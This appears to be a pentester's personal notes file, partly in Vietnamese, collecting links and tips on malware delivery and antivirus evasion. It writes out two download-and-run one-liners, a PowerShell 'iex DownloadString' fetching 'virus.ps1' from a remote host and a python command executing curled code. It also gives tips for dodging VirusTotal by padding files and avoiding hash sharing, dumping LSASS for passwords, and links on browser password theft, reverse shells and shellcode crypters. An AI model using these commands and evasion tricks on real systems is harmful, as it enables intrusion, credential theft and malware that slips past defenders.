# Tips
chèn thêm rất nhiều byte 0 vào cuối để tăng kích thước lên trên 700MB, Virus total giới hạn kích thước tải lên là 650MB
https://cookiearena.org/case-study/phan-tich-ma-doc-tan-cong-doanh-nghiep-ban-hang-online/
VirusTotal hay mách lẻo, nếu nó phát hiện phần mềm của chúng ta là độc hại. Nó sẽ chia sẻ hash cho tất cả các phần mềm AV khác được biết. Điều này tốt cho người dùng nhưng không tốt cho Pentester . Cho nên antiscan.me là lựa chọn tốt hơn (tuy rằng công cụ này cũng rất giỏi vòi tiền)
https://quantrimang.com/cong-nghe/trojan-gia-lam-pdf-bang-phuong-phap-rlo-195731 fake pdf (anti virus blocked)
https://viblo.asia/p/bypass-powershell-execution-policies-tren-windows-MG24BrER4z3
(kỹ thuật này vô hiệu hóa các phần mềm diệt Virus thông thường)
```
powershell -nop -c "iex (New-Object Net.WebClient).DownloadString ('http://10.0.37.216:8080/virus.ps1')"
```
```
python -c "`curl https://raw.githubusercontent.com/Shengpy/test/main/a.py`"
```
## password stealing from browser
https://drx.home.blog/2018/07/20/tu-viet-chuong-trinh-danh-cap-password-duoc-luu-trong-chrome-bang-python/#more-122
https://github.com/ohyicong/decrypt-chrome-passwords
## Reverse shell
https://systemweakness.com/ms-word-macros-with-powercat-reverse-shell-58b20983e0f0
https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/
## dll hijacking
https://crypt0ace.github.io/posts/DLL-Sideloading/
https://sec.vnpt.vn/2023/04/dll-proxying-for-persistence/
https://viblo.asia/p/share-libraries-hijacking-tren-linux-gAm5yEVX5db
iso
https://blog.sunggwanchoi.com/recreating-an-iso-payload-for-fun-and-no-profit/
## Powershell
https://medium.com/@huseyin.eksi/powershell-security-7039d73e32fd
https://github.com/PowerShellMafia/PowerSploit
## Shellcode injection
https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/
# bypass antivirus
https://viblo.asia/p/cac-phuong-phap-bypass-av-co-ban-bWrZnQgvKxw?fbclid=IwAR0eoXpUIZRrPgTTEargMDwlJyrsBSkOQEuAsjPxP0ZAUzOrRAsezbyG7tM
https://topdev.vn/blog/huong-dan-cai-dat-clamav-tren-linux-de-quet-virus-malware-trojan/
https://0xdf.gitlab.io/2020/02/01/htb-re.html
https://github.com/danielbohannon/Invoke-Obfuscation #powershell obfuscation
https://anonyviet.com/cach-hacker-bypass-av-xam-nhap-windows-voi-autoit/
https://www.batch-obfuscator.tk/
https://anonyviet.com/minh-da-bypass-av-xam-nhap-windows-10-voi-metasploit-va-python-nhu-the-nao/
https://docs.google.com/presentation/d/1Fdcbv9U1qywIZSl2AhXJAlx61pyEITKfcbbwpJMvkcQ/edit#slide=id.g8d8b1cad0d_1_27
1.Use non-malicious software in malicious ways (preferred)
Instead of Metasploit’s psexec implementation, use PsExec.exe from Microsoft
Instead of Mimikatz.exe, dump LSASS memory with Task Manager and extract passwords elsewhere
Instead of hashdump, save out registry hives and extract hashes elsewhere
Instead of meterpreter (at first), use SSH, Remote Desktop, mRemote-NG, TeamViewer, etc.
2.Add extra strings (from legitimate software) to increase the “goodness” score
# Assembly shellcode
Create a Shell_Bind_TCP Shellcode
https://bohansec.com/2020/08/27/SLAE32-Assignment1/
Create a Shell_Reverse_TCP Shellcode
https://bohansec.com/2020/08/30/SLAE32-Assignment2/
egg hunter
https://bohansec.com/2020/09/01/SLAE32-Assignment3/
jump to that shell code address and execute
encoding schema
https://bohansec.com/2020/09/05/SLAE32-Assignment4/
Take up at least 3 shellcode examples created using msfvenom for linux x86
https://bohansec.com/2020/09/18/SLAE32-Assignment5/
Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
https://bohansec.com/2020/09/27/SLAE32-Assignment6/
Create a custom crypter like the one shown in the "crypters" video
https://bohansec.com/2020/09/29/SLAE32-Assignment7/
# Read more
https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking
https://n1ght-w0lf.github.io/categories/#malware-analysis
https://crypt0ace.github.io/